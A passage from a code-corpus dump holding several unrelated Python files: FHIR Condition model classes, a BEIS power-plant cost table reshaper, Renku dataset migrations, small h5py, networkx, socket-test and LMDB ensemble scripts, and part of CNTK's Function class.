class ConditionEvidence(backboneelement.BackboneElement):
""" Supporting evidence.
Supporting evidence / manifestations that are the basis of the Condition's
verification status, such as evidence that confirmed or refuted the
condition.
"""
resource_type = "ConditionEvidence"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.code = None
""" Manifestation/symptom.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.detail = None
""" Supporting information found elsewhere.
List of `FHIRReference` items referencing `['Resource']` (represented as `dict` in JSON). """
super(ConditionEvidence, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ConditionEvidence, self).elementProperties()
js.extend(
[
(
"code",
"code",
codeableconcept.CodeableConcept,
"CodeableConcept",
True,
None,
False,
),
(
"detail",
"detail",
fhirreference.FHIRReference,
"Reference",
True,
None,
False,
),
]
)
return js
class ConditionStage(backboneelement.BackboneElement):
""" Stage/grade, usually assessed formally.
Clinical stage or grade of a condition. May include formal severity
assessments.
"""
resource_type = "ConditionStage"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.assessment = None
""" Formal record of assessment.
List of `FHIRReference` items referencing `['ClinicalImpression', 'DiagnosticReport', 'Observation']` (represented as `dict` in JSON). """
self.summary = None
""" Simple summary (disease specific).
Type `CodeableConcept` (represented as `dict` in JSON). """
self.type = None
""" Kind of staging.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(ConditionStage, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ConditionStage, self).elementProperties()
js.extend(
[
(
"assessment",
"assessment",
fhirreference.FHIRReference,
"Reference",
True,
None,
False,
),
(
"summary",
"summary",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
(
"type",
"type",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
]
)
return js
try:
from . import age
except ImportError:
age = sys.modules[__package__ + ".age"]
try:
from . import annotation
except ImportError:
annotation = sys.modules[__package__ + ".annotation"]
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + ".codeableconcept"]
try:
from . import fhirdate
except ImportError:
fhirdate = sys.modules[__package__ + ".fhirdate"]
try:
from . import fhirreference
except ImportError:
fhirreference = sys.modules[__package__ + ".fhirreference"]
try:
from . import identifier
except ImportError:
identifier = sys.modules[__package__ + ".identifier"]
try:
from . import period
except ImportError:
period = sys.modules[__package__ + ".period"]
try:
from . import range
except ImportError:
range = sys.modules[__package__ + ".range"]
|
the-stack_0_6154 | import os
from functools import reduce
from itertools import count, islice, cycle
import numpy as np
import pandas as pd
from pandas.api.types import is_string_dtype
pd.set_option('display.max_columns', 70)
pd.set_option('display.max_rows', 200)
def plant_data(dat):
"""
Takes the first part of the dataframe from the CSV file from the tables included in BEIS_Electricity_Generation_Cost_Report, and returns a dataframe with powerplants as columns and each data as columns
:param dat: Input dataframe from BEIS_Electricity_Generation_Cost_Report
:return: Returns first part of table, which includes plant size, average load factor, efficiency and operating period with power plants as rows and columns as data about said power plants
"""
characteristics = dat.loc[0:2].dropna(axis='columns').drop(['Unnamed: 1'], axis=1).transpose() # Fills empty column names, deletes units, and transposes dataframe so that plants are as rows
operating_period = dat.loc[9].dropna().drop(['Unnamed: 1']).transpose().to_frame() # Transposes operating period and drops units
dat = characteristics.merge(operating_period, left_index=True, right_index=True) # Merges the two series together to form a single dataframe
dat = dat.rename(index=str, columns = {0:"Plant_Size",1:"Average_Load_Factor",2:"Efficiency",9:"Operating_Period"}) # Rename columns
return dat
def development_period(dat):
"""
Takes the entire dataframe from a table included in BEIS_Electricity_Generation_Cost_Report and returns data about the pre-development and construction cost expenditure information per year
:param dat: Dataframe of the table included in BEIS_Electricity_Generation_Cost_Report
:return: Returns a dataframe of power plant data which contains pre-development and construction expenditure information per year
"""
dat = dat.iloc[3:9].copy()
dat.iloc[:, 0] = dat.iloc[:, 0].fillna(method='ffill')
dat.iloc[:, 0] = dat.iloc[:, 0].replace({ # Shorten column names
"Pre-development period ":"Pre", "Construction period ":"Constr"})
dat.iloc[:, 1] = dat.iloc[:, 1].replace({ # Shorten column names
"Duration and % spend per years 1 & 2 ": "Dur,1,2",
"% spend per years 3, 4, & 5 ": "3,4,5",
"% spend per years 6, 7, & 8 ": "6,7,8"})
dat['A'], dat['B'], dat['C'] = dat.iloc[:, 1].str.split(',', 2).str # Split duration and spend per year to respective column
dat = dat.drop(['Unnamed: 1'], axis=1)
dat['A'], dat['B'], dat['C'] = dat['Unnamed: 0'] + "_" + dat['A'], dat['Unnamed: 0'] + "_" + dat['B'], dat['Unnamed: 0'] + "_" + dat['C'] # Merge column name with year information
tot_cols = []
for it in islice(count(), 1, len(dat.columns), 3): # Skip through to columns containing power plant information
cycle_period = cycle(['A', 'B', 'C']) # Cycle through rows to create column names
for val in range(0, 3): # Three values per power plant
period = next(cycle_period)
cols = pd.DataFrame({'plant': dat.columns.values[it],'period': dat[period],'value': dat.iloc[:, it+val]}) # Create dataframe in wide format
tot_cols.append(cols)
db = pd.concat(tot_cols).reset_index().drop(['index'],axis=1) # Concatenate all dataframes
db = db.pivot(index='plant', columns='period', values='value') # Transform dataframe to wide format
return db
def costs(dat):
"""
Takes dataframe from CSV file of BEIS_Electricity_Generation_Cost_Report and returns cost section of data into a wide format with power plant data per row
:param dat: Dataframe starting from Table 19 found in BEIS_Electricity_Generation_Cost_Report
:return: Returns dataframe of cost information in wide format
"""
dat=dat[10:].copy()
dat.iloc[:, 0] = dat.iloc[:, 0].fillna(method='ffill') # Fill in blanks of power plant information
dat.iloc[:, 0] = dat.iloc[:, 0].replace({ # Shorten column names
"Pre-development £/kW ":"Pre_dev_cost", "Construction £/kW ":"Constr_cost",
"Infrastructure £'000s ":"Infra_cost", "Fixed O&M £/MW/year ":"Fixed_cost",
"Variable O&M £/MWh ":"Var_cost","Insurance £/MWh/year ":"Insurance_cost",
"Connection and Use of System charges £/MW/year ":"Connect_system_cost"
})
dat.iloc[:, 0] = dat.iloc[:, 0] + "-" + dat.iloc[:, 1] # Merge cost information with projection (high, medium or low)
dat = dat.drop(['Unnamed: 1'], axis=1)
col_names = []
col_values = []
plant_names = [x for z in range(13) for x in dat.columns if not "Unnamed:" in x for y in range(3)] # Create list containing plant names in correct order
for x in dat[2:].itertuples(index=False): # Loop through each row of dataframe
for j in range(1,len(x)):
col_names.append(x[0]+"_"+dat.iloc[1, j]) # Create column names by merging year of cost with cost type and projection
col_values.append(x[j]) # Take column value
cols_df = pd.DataFrame({'columns':col_names,'plant':plant_names,'col_values':col_values}) # Create dataframe
cols_df = cols_df.pivot(index="plant",values='col_values',columns='columns') # Make into wide format
return cols_df
def merge_plant_cost_tables(df):
"""
Function to bring together all sections of dataframe
:param df: Dataframe starting from Table 19 found in BEIS_Electricity_Generation_Cost_Report
:return: Returns final dataframe found in BEIS_Electricity_Generation_Cost_Report Table 19 in wide format
"""
plant = plant_data(df) # Call functions
dev = development_period(df)
cost = costs(df)
dfs = [plant, dev, cost] # Create a list of dataframes
df_final = reduce(lambda left, right: pd.merge(left,right, left_index=True, right_index=True), dfs) # Merge each dataframe together
return df_final
def beis_human_to_machine_format(dir):
final_df = []
for file in os.listdir(dir):
file_p = "/Users/b1017579/Documents/PhD/Projects/10. ELECSIM/10. ELECSIM/data/Power_Plants/Power_Plant_costs/plant_costs_files/"+file
df = pd.read_csv(file_p).replace("- ",np.nan)
final_df.append(merge_plant_cost_tables(df))
final_df = pd.concat(final_df)
# Remove comma seperator for increments of 1000 and unit of year
final_df = final_df.apply(lambda x: x.str.replace(',', ''), axis=1).apply(lambda x: x.str.replace(' years',''), axis=1)
# Remove the % sign and divide by 100
final_df = final_df.apply(lambda x: x.str.replace("%", "").astype('float')/100 if is_string_dtype(x) and x.str.contains('%').all() else x)
print(final_df)
return final_df
p_dat = beis_human_to_machine_format("/Users/b1017579/Documents/PhD/Projects/10. ELECSIM/10. ELECSIM/data/Power_Plants/Power_Plant_costs/plant_costs_files")
p_dat.to_csv("/Users/b1017579/Documents/PhD/Projects/10. ELECSIM/10. ELECSIM/data/Power_Plants/Power_Plant_costs/plant_cost_data_nan.csv")
|
the-stack_0_6157 | # -*- coding: utf-8 -*-
#
# Copyright 2020 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Initial migrations."""
import os
import shutil
import urllib
import uuid
from pathlib import Path, posixpath
from urllib.parse import quote
from renku.core.management.repository import DEFAULT_DATA_DIR as DATA_DIR
from renku.core.models.datasets import Dataset
from renku.core.models.refs import LinkReference
from renku.core.utils.urls import url_to_string
def migrate(client):
"""Migration function."""
_ensure_clean_lock(client)
_do_not_track_lock_file(client)
_migrate_datasets_pre_v0_3(client)
_migrate_broken_dataset_paths(client)
_fix_uncommitted_labels(client)
_fix_dataset_files_urls(client)
_fix_broken_dataset_file_project(client)
_dataset_file_id_migration(client)
_migrate_files_project(client)
def _ensure_clean_lock(client):
"""Make sure Renku lock file is not part of repository."""
lock_file = client.path / '.renku.lock'
try:
lock_file.unlink()
except FileNotFoundError:
pass
def _do_not_track_lock_file(client):
"""Add lock file to .gitingore if not already exists."""
# Add lock file to .gitignore.
lock_file = '.renku.lock'
gitignore = client.path / '.gitignore'
if lock_file not in gitignore.read_text():
gitignore.open('a').write('\n{0}\n'.format(lock_file))
def _migrate_datasets_pre_v0_3(client):
"""Migrate datasets from Renku 0.3.x."""
def _dataset_pre_0_3(client):
"""Return paths of dataset metadata for pre 0.3.4."""
project_is_pre_0_3 = int(client.project.version) < 2
if project_is_pre_0_3:
return (client.path / DATA_DIR).rglob(client.METADATA)
return []
for old_path in _dataset_pre_0_3(client):
name = str(old_path.parent.relative_to(client.path / DATA_DIR))
dataset = Dataset.from_yaml(old_path, client=client)
new_path = (client.renku_datasets_path / dataset.uid / client.METADATA)
new_path.parent.mkdir(parents=True, exist_ok=True)
with client.with_metadata(read_only=True) as meta:
for module in client.repo.submodules:
if Path(module.url).name == meta.name:
module.remove()
for file_ in dataset.files:
if not Path(file_.path).exists():
expected_path = (
client.path / DATA_DIR / dataset.name / file_.path
)
if expected_path.exists():
file_.path = expected_path.relative_to(client.path)
dataset.__reference__ = new_path.relative_to(client.path)
dataset.to_yaml()
Path(old_path).unlink()
ref = LinkReference.create(
client=client,
name='datasets/{0}'.format(name),
force=True,
)
ref.set_reference(new_path)
def _migrate_broken_dataset_paths(client):
"""Ensure all paths are using correct directory structure."""
for dataset in client.datasets.values():
dataset_path = client.path / dataset.path
expected_path = (
client.renku_datasets_path /
Path(quote(dataset.identifier, safe=''))
)
# migrate the refs
ref = LinkReference.create(
client=client,
name='datasets/{0}'.format(dataset.short_name),
force=True,
)
ref.set_reference(expected_path / client.METADATA)
if not dataset_path.exists():
dataset_path = (
client.renku_datasets_path / uuid.UUID(dataset.identifier).hex
)
if not expected_path.exists():
shutil.move(dataset_path, expected_path)
dataset.path = expected_path
dataset.__reference__ = expected_path / client.METADATA
for file_ in dataset.files:
file_path = Path(file_.path)
if not file_path.exists() and file_.path.startswith('..'):
new_path = (
client.renku_datasets_path / dataset.uid / file_path
).resolve().relative_to(client.path)
file_.path = new_path
_, commit, _ = client.resolve_in_submodules(
client.find_previous_commit(file_.path, revision='HEAD'),
file_.path,
)
host = client.remote.get('host') or 'localhost'
host = os.environ.get('RENKU_DOMAIN') or host
# always set the id by the identifier
file_._id = urllib.parse.urljoin(
'https://{host}'.format(host=host),
posixpath.join(
'/blob/{hexsha}/{path}'.format(
hexsha=commit.hexsha, path=new_path
)
)
)
file_._label = '{}@{}'.format(new_path, commit.hexsha)
dataset.to_yaml()
def _fix_uncommitted_labels(client):
"""Ensure files have correct label instantiation."""
for dataset in client.datasets.values():
for file_ in dataset.files:
try:
_, commit, _ = client.resolve_in_submodules(
client.find_previous_commit(file_.path, revision='HEAD'),
file_.path,
)
file_.commit = commit
if (
not file_._label or 'UNCOMMITTED' in file_._label or
'@' not in file_._label
):
file_._label = file_.default_label()
file_._id = file_.default_id()
except KeyError:
pass
dataset.to_yaml()
def _fix_dataset_files_urls(client):
"""Ensure dataset files have correct url format."""
for dataset in client.datasets.values():
for file_ in dataset.files:
if file_.url:
file_.url = url_to_string(file_.url)
dataset.to_yaml()
def _fix_broken_dataset_file_project(client):
"""Ensure project is correctly set on ``DatasetFile``."""
for dataset in client.datasets.values():
for file_ in dataset.files:
if not file_._project or 'NULL/NULL' in file_._project._id:
file_._project = client.project
dataset.to_yaml()
def _dataset_file_id_migration(client):
"""Ensure dataset files have a fully qualified url."""
for dataset in client.datasets.values():
for file_ in dataset.files:
if not file_._id.startswith('https'):
file_._id = file_.default_id()
dataset.to_yaml()
def _migrate_files_project(client):
"""Ensure dataset files have correct project."""
for dataset in client.datasets.values():
for file_ in dataset.files:
file_._project = dataset._project
dataset.to_yaml()
|
the-stack_0_6158 | import networkx as nx
def build_graph(filename):
f = open(filename)
f = f.read()
regex = re.compile("[ins|isa]\(i(\d+),i(\d+)\)")
regex_class = re.compile("class\(i(\d+)\)")
instances = frozenset(regex.findall(f))
classes = frozenset(regex_class.findall(f))
# create directed graph on the instances
G = nx.DiGraph()
G.add_edges_from(instances)
return G
|
the-stack_0_6159 | import sys
import h5py
import matplotlib.pyplot as plt
if __name__ == "__main__":
with h5py.File(sys.argv[1], "r") as hdf:
# Print the dataset names in the file
datasets = list(hdf)
print(datasets)
# Plot the counter mean values for the 3 counters we know are captured
for i in range(1, 4):
plt.plot(hdf[f"COUNTER{i}.OUT.Mean"], label=f"Counter {i}")
# Add a legend and show the plot
plt.legend()
plt.show()
|
the-stack_0_6160 | import socket
s = socket.socket()
s.bind(("localhost", 9999))
s.listen(1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sc, addr = s.accept()
for i in range(3):
ricevutoByte = sc.recv(4096)
#ricevuto = str(ricevutoByte, "ascii")
#print("Ricevuto:", ricevuto)
if ricevutoByte == bytes("q","ascii") or ricevutoByte == None:
break
command = ricevutoByte[0:4]
if command == bytes("FIND", "ascii"):
ricevutoByte = bytes("AFIN003"+"0"*16+"a"*99+"1"+"002"+"192.168.001.001|fc00"+":1000"*7+"12345"+"192.168.001.002|fc00"+":2000"*7+"12345"+"0"*16+"a"*99+"2"+"001"+"192.168.001.003|fc00"+":3000"*7+"12345", "UTF-8")
#ricevutoByte = bytes("AFIN001"+"0"*16+"a"*99+"1"+"002"+"192.168.001.001|fc00"+":1000"*7+"12345", "UTF-8")
sc.send(ricevutoByte)
print("Shutdown")
sc.close()
s.close()
|
the-stack_0_6162 | import os
import argparse
import struct
import lmdb
import csv
from dataset import find_inputs
import time
import numpy as np
import pandas as pd
import zlib
parser = argparse.ArgumentParser(description='Process cdiscount datasets')
parser.add_argument('data', metavar='DIR',
help='dir of images')
parser.add_argument('--categories', default='', type=str, metavar='PATH',
help='path to category map file')
def main():
args = parser.parse_args()
start = time.time()
categories = []
if os.path.isfile(args.categories):
category_df = pd.read_csv(args.categories)
categories = category_df.category_id
categories = sorted(categories)
else:
print('WARNIGN: No category mapping found, writing raw label indices into output.')
cf = open(os.path.join('./', 'results-ensemble.csv'), mode='w')
writer = csv.writer(cf)
writer.writerow(['_id', 'category_id'])
dirs = args.data.split(',')
envs = [lmdb.open(d, sync=False, readahead=False, readonly=True, lock=False) for d in dirs]
txns = [e.begin() for e in envs]
cursors = [t.cursor() for t in txns]
num_sources = len(envs)
probs = []
prev_prod_id = -1
written = 0
def _write_result():
if num_sources == len(probs):
result = np.mean(probs, axis=0)
else:
probs_arr = np.array(probs)
for i in range(num_sources):
probs_arr[-i] *= 2.0
result = np.sum(probs_arr, axis=0)
top1_label = np.argmax(result)
writer.writerow([prev_prod_id, categories[top1_label] if categories else top1_label])
try:
iters = [c.iternext(keys=True, values=True) for c in cursors]
while True:
fetches = [i.__next__() for i in iters]
for i, (k, v) in enumerate(fetches):
prod_id, img_id = struct.unpack('>IB', k)
if written % 1000 == 0 and i == 0:
print(prod_id, img_id)
if prev_prod_id > 0 and (i == 0 and prod_id != prev_prod_id):
_write_result()
written += 1
probs = []
va = np.frombuffer(zlib.decompress(v), dtype=np.float32)
prev_prod_id = prod_id
probs.append(va)
except StopIteration:
print('STOP')
pass
if probs:
_write_result()
written += 1
print(written)
print('Inputs via LMDB took', time.time() - start)
if __name__ == '__main__':
main() |
the-stack_0_6163 | from os import path
from enum import Enum, unique
import sys
import warnings
import collections
import cntk
from cntk import cntk_py, Value
from cntk.device import DeviceDescriptor, cpu
from cntk.internal import map_if_possible, typemap, sanitize_var_map,\
sanitize_batch, sanitize_dtype_cntk, _as_tuple,\
sanitize_variable_value_dict,\
sanitize_Function_attributes,\
sanitize_variables_or_functions,\
_value_as_sequence_or_array
from cntk.internal.utils import get_python_function_arguments, \
map_function_arguments, _py_dict_to_cntk_dict, \
_to_cntk_dict_value
from cntk.internal import _UDFDeserializeCallbackWrapper, _serialize
from cntk.internal.sanitize import is_byte_buffer
from ..variables import Record, Variable
@unique
class CloneMethod(Enum):
'''
Describes different ways how :func:`~cntk.ops.functions.Function.clone`
works.
'''
share = 'share'
'''
Parameters are shared between the Function being cloned and the new clone
'''
clone = 'clone'
'''
New learnable parameters are created and initialized with the current values of the
corresponding parameters of the Function being cloned
'''
freeze = 'freeze'
'''
Parameters are cloned and made immutable; i.e. Constants in the new clone
(e.g. for use as a fixed feature extractor)
'''
class Function(cntk_py.Function):
'''
Base class of all primitive tensor operators.
If it has only one output, one can invoke Variable methods on it, which it
will relay to its only output.
`Function` objects can also be constructed directly from a Python lambda,
by means of the `@Function` decorator.
The `Function`'s input signature is defined by the lambda.
Example:
>>> @Function
... def f(x):
... return x * x
>>> print(f) # inspect the Function's type
ElementTimes(x: Sequence[tensor]) -> Sequence[tensor]
The above form creates a CNTK Function whose arguments are placeholder variables.
Such a function can only be combined with other symbolic functions.
To train a Function or pass data to it, you need to declare the types
of the arguments. In this case, the @Function decorator creates a CNTK Function
whose arguments are input variables.
If you use Python 3, Functions with types are declared using Python annotation syntax, e.g.::
@Function
def f(x:Tensor[13]):
return x * x
If you are working with Python 2.7, use CNTK's :class:`@Signature <cntk.layers.typing.Signature>` decorator instead::
>>> from cntk.layers.typing import *
>>> @Function
... @Signature(Tensor[13])
... def f(x):
... return x * x
>>> print(f)
ElementTimes(x: Tensor[13]) -> Tensor[13]
``make_block=True`` is an internal parameter used to implement :func:`@BlockFunction <cntk.ops.functions.BlockFunction>`.
If `BlockFunction()` passes `True`, then the result will be wrapped
in :func:`~cntk.ops.as_block()`, using the supplied ``op_name`` and ``name`` parameters, which are otherwise ignored.
'''
_udf_callback_map = {}
_deserializer = _UDFDeserializeCallbackWrapper(_udf_callback_map)
cntk_py._register_udf_deserialize_callback(_deserializer)
# We override the constructors to implement an overload that constructs
# a CNTK Functions from a Python function (@Function).
def __new__(cls, *args, **kwargs):
if len(args) > 0 and hasattr(args[0], '__call__') and not isinstance(args[0], Function): # overload
return Function._to_Function(*args, **kwargs)
return super(Function, cls).__new__(cls) # for some reason, passing *args, **kwargs fails with "object() takes no args
def __init__(self, *args, **kwargs):
if len(args) > 0 and hasattr(args[0], '__call__') and not isinstance(args[0], Function): # overload
return
super(Function, self).__init__(*args, **kwargs)
# TODO: bring this back once we have a design for name-accessible .outputs etc.
#class NamedOutput:
# def __init__(self, **kwargs):
# for kw in kwargs: # TODO: only allow one arg
# self.name = kw
# self.arg = kwargs[kw]
_placeholders_under_construction = set()
@staticmethod
def _to_Function(f, make_block=False, op_name=None, name=None):
'''implements @Function decorator; see :class:`~cntk.layers.functions.Function`'''
f_name = f.__name__ # (only used for debugging and error messages)
# helper to create a CNTK placeholder or input for a given name
# An input is created if the parameter is annotated with a Tensor(...) type.
# In this case, CNTK will immediately trigger type inference.
# Unannotated parameters will yield placeholder variables instead.
from .. import placeholder
def make_arg_variable(name, annotations):
from ..variables import Variable
var_type = annotations.get(name, None)
var_type = Variable._Type._sanitize(var_type)
if isinstance(var_type, Variable._Type):
return cntk.input_variable(name=name, **var_type)
else:
return placeholder(name=name)
from ..default_options import default_options
# Parameter() creation inside code of a Function def is forbidden. Setting 'pure' blocks it in Parameter().
with default_options(pure=True):
# get the parameter list through inspection
arg_names, annotations = get_python_function_arguments(f)
# The Python function is converted to a CNTK Function by executing it once
# passing placeholders as inputs. This createss a piece of graph.
# During execution, the Placeholders of this function are hidden from signatures of any
# further Functions that may be defined inside this invocation.
# This is required when @Function definitions are nested, and expression from
# the outer @Function block is used in an inner block, which would introduce
# additional Placeholders that will show up as .arguments.
# This is prevented by (1) maintaining a "invisible placeholders" list,
# and always filtering .arguments against that list. This is done by the property .signature;
# i.e. in all of this, do not use .arguments; use .signature instead.
from .. import combine, alias, as_block
args = [make_arg_variable(arg_name, annotations) for arg_name in arg_names]
# helpers
def force_order_args(fun_args):
block_args = [placeholder(name=fun_arg.name) for fun_arg in fun_args] # placeholders inside the BlockFunction
combined_block_args = combine(block_args) # the content of the BlockFunction
arg_map = list(zip(block_args, fun_args)) # after wrapping, the block_args map to args
return as_block(composite=combined_block_args, block_arguments_map=arg_map, block_op_name='Tuple').outputs
def invoke(fun_args):
try:
# hide Placeholders of this function from .signature() of any function defined inside
for arg in args:
Function._placeholders_under_construction.add(arg)
out = f(*fun_args)
if out is None:
raise TypeError("CNTK Function '{}' must return a value".format(f_name))
finally:
# unhide Placeholders of this function again
for arg in args:
Function._placeholders_under_construction.remove(arg)
# resolve tuples and NamedOutputs --TODO: check for duplicates
def resolve_named(output):
#if isinstance(output, Function.NamedOutput): # a tuple member is wrapped in a NamedOutput class, we got a name for it
# output = alias(output.arg, name=output.name)
# ^^ TODO: Complete the design for name-accessible .outputs, then bring this back.
if isinstance(output, cntk_py.Variable):
output = combine([output]) # workaround: wrap in another combine() call
# TODO: ^^ is this still necessary? Or is this a sanitize() call we need here?
return output
if isinstance(out, tuple): # multi-valued function, returned as a tuple
out = [resolve_named(output) for output in out]
# BUGBUG: combine() does not allow duplicates, so we wrap them in alias()
out_seen = set()
for i, out_i in enumerate(out):
if out_i in out_seen:
out[i] = alias(out_i)
else:
out_seen.add(out_i)
out = combine(out) # --> turn into a combine()
else:
out = resolve_named(out)
return out
# if called from BlockFunction() then wrap into a block
if make_block: # if we make a block then run off a separate set
block_args = [make_arg_variable(arg.name, annotations) for arg in args] # placeholders inside the BlockFunction
out = invoke(block_args)
out = as_block(composite=out, block_arguments_map=list(zip(block_args, args)), block_op_name=op_name, block_instance_name=name)
# not a block: ensure parameter ordering
else:
fun_args = args
#if len(fun_args) > 1:
# fun_args = force_order_args(fun_args)
# BUGBUG: Python interpreter crashes sometimes with this enabled, so for now fix it after the fact only if needed
# now invoke the Python function
out = invoke(fun_args)
# BUGBUG workaround: fix it after the fact with an inefficient solution only if we got it wrong
out_arg_names = [arg.name for arg in out.signature]
if set(out_arg_names) == set(arg_names) and out_arg_names != arg_names: # order came out wrong
fun_args = force_order_args(fun_args)
out = invoke(fun_args)
# verify that we got the parameter order right
out_arg_names = [arg.name for arg in out.signature]
assert out_arg_names == arg_names
if len(out.signature) != len(args):
unfulfilled_args = set(out.signature) - set(args)
if unfulfilled_args:
unfulfilled_arg_names = [arg.name for arg in unfulfilled_args]
raise TypeError("CNTK Function '{}' has {} missing arguments ({}), which is currently not supported".format(f_name, len(unfulfilled_arg_names), ", ".join(unfulfilled_arg_names)))
else:
unused_args = set(args) - set(out.signature)
unused_arg_names = [arg.name for arg in unused_args]
raise TypeError("CNTK Function '{}' has {} unused arguments ({}), which is currently not supported".format(f_name, len(unused_arg_names), ", ".join(unused_arg_names)))
return out
@property
def signature(self):
'''
Returns the signature of a Function.
This is the .arguments[] list without placeholders that belong to an outer, not yet completed @Function def.
'''
sig = [arg for arg in self.arguments if arg not in Function._placeholders_under_construction]
return tuple(sig)
def argument_map(self, *args, **kwargs):
'''
Determines the {placeholder: variable} map for use with various call operations
Returns a dictionary from this function's placeholders to whatever arguments are passed.
Accepted are both positional and keyword arguments.
This mimics Python's argument interpretation, except that keyword arguments are not optional
(there is no concept of default value).
This does not require the arguments to be Variables or Functions. It is also called by train_minibatch().
'''
params = self.signature # function parameters
if len(args) + len(kwargs) != len(params):
raise TypeError("CNTK Function expected {} arguments, got {}".format(len(params), len(args) + len(kwargs)))
params_dict = { arg.name: arg for arg in params }
return map_function_arguments(params, params_dict, *args, **kwargs)
@staticmethod
def _replace_args_type_check(arg_map): # type: (Dict[param: Variable, arg: Variable]), param meant to be substituted by arg
'''
Performs a type-compatibility check for arguments to replace_placeholders() and clone(),
in order to output an actionable error message in case of an error.
'''
for i, arg_map_item in enumerate(arg_map.items()):
param = arg_map_item[0] # parameter = what gets substituted
arg = arg_map_item[1] # argument = what it gets substituted with
#print('checking param', param.name, 'against arg', arg.name)
param_type = param._type
arg_type = arg._type if isinstance(arg, cntk_py.Variable) else arg.output._type if isinstance(arg, Function) else None
def param_name(): # helper to get a descriptive name for param
if param.name:
return "argument %s" % param.name
else:
return 'positional argument %d' % i
if not arg_type:
raise TypeError(param_name() + " was passed an object that is not a Variable or Function")
# parameter shape is not yet known, any input is acceptable
if not param_type.shape_is_known or param.is_placeholder:
# Note: if a Function with nown inputs gets cloned while replacing the inputs
# with placeholders, those placeholders retain their shapes for some reason.
# But in this case, it should be allowed to replace them with mismatching dimensions,
# hence we do not test placeholders, only inputs.
# TODO: Should clone-replacing inputs with placeholders reset the shapes to unknown?
continue
if not arg_type.shape_is_known:
raise TypeError(param_name() + ' has a known shape, and cannot be passed a Variable of unknown shape')
# TODO: add tests for this complex condition
if len(arg_type.shape) < len(param_type.shape) or \
arg_type.shape[-len(param_type.shape):] != param_type.shape or \
(arg_type.dynamic_axes and arg_type.dynamic_axes != param_type.dynamic_axes) or \
arg_type.dtype != param_type.dtype or \
arg_type.is_sparse != param_type.is_sparse:
raise TypeError(param_name() + "'s type " + str(param_type) + " is incompatible with the type " + str(arg_type) + " of the passed Variable")
def update_signature(self, *arg_types, **kwarg_types):
'''
Defines input shapes, in-place
e.g.
model.update_signature(42)
pass a list of objects that define the dimensions etc. of the placeholders
Currently you can pass an int, a tuple, an Input, or a dict created with Type()
'''
arg_map = self.argument_map(*arg_types, **kwarg_types) # map type specs to Function parameters
def to_input(arg_type, name):
#from cntk import input
from ..variables import Variable
if isinstance(arg_type, (int, tuple)): # just passed a shape
return cntk.input_variable(shape=_as_tuple(arg_type), name=name)
arg_type = Variable._Type._sanitize(arg_type)
if isinstance(arg_type, Variable._Type): # full type given as Tensor[...] etc.
return cntk.input_variable(name=name, **arg_type)
raise TypeError("update_signature() expects arguments of type int, tuple of int, or Type.Variable")
# map the given types:
# - create an Input with the given Type or shape
# - keep the name property of the Function parameter
# - skip argument types passed as None
arg_map = { param: to_input(arg_type, name=param.name) for param, arg_type in arg_map.items() if arg_type is not None }
Function._replace_args_type_check(arg_map)
self.replace_placeholders(arg_map)
def declare_args(self, *arg_types):
'''
Back-compat wrapper for update_signature() (beta12 and before).
'''
warnings.warn('This will be removed in future versions. Please use '
'update_signature(...) instead', DeprecationWarning)
placeholders = self.placeholders # the unbound parameters to fill in
if len(arg_types) != len(placeholders):
raise TypeError("CNTK Function.declare_args() expected {} arguments, got {}".format(len(placeholders), len(arg_types)))
def to_input(arg):
if isinstance(arg, cntk_py.Variable):
return arg
else:
#from cntk import input
return cntk.input_variable(arg)
args = [to_input(arg) for arg in arg_types]
arg_map = dict(zip(placeholders, args))
Function._replace_args_type_check(arg_map)
self.replace_placeholders(arg_map)
def __call__(self, *args, **kwargs):
'''
Call a Function, either on symbolic or numeric inputs.
* If at least one input is a CNTK Function or Variable, then
result is a CNTK Function object, with inputs bound to the arguments.
This is a short-hand for `f.clone(share, argument_map(*args, **kwargs))`.
* Otherwise, all arguments must be numbers, numpy arrays, or a :class:`~cntk.io.MinibatchData` instance.
Then perform the actual computation and return the numeric result.
This is a short-hand for `f.eval(argument_map(*args, **kwargs))`,
except that there is no `device` parameter. If you need that, use `eval()` directly.
Args:
*args, **kwargs: The arguments to pass to the Function.
Returns:
In case of symbolic inputs, returns another CNTK Function object with inputs bound to the arguments.
Otherwise returns a tuple of numpy arrays for tuple-valued Functions, and a single numpy array otherwise.
'''
# parse argument list and map to the function's input
arg_map = self.argument_map(*args, **kwargs)
# if placeholders were excluded due to being under construction,
# we must include them in the argmap, otherwise they will be cloned
for arg in self.arguments:
if arg not in arg_map:
arg_map[arg] = arg
# determine whether this is eval() or clone()
is_symbolic = any(isinstance(arg, (cntk_py.Function, cntk_py.Variable)) for arg in arg_map.values())
# symbolic: return a cloned Function
# applying the function means to inline its piece of graph
if is_symbolic:
Function._replace_args_type_check(arg_map)
return self.clone(CloneMethod.share, arg_map)
# numeric: evaluate
outputs = self.outputs
_, output_map = self.forward(arg_map, outputs)
assert len(output_map) == len(outputs)
if len(output_map) > 1: # tuple-valued: return tuple
return tuple(output_map[output] for output in outputs)
else: # single value: return numpy array and that's it
return list(output_map.values())[0]
# TODO: remove the parallel application; instead
# - function tuples always operate on all inputs, just as if they were a single function
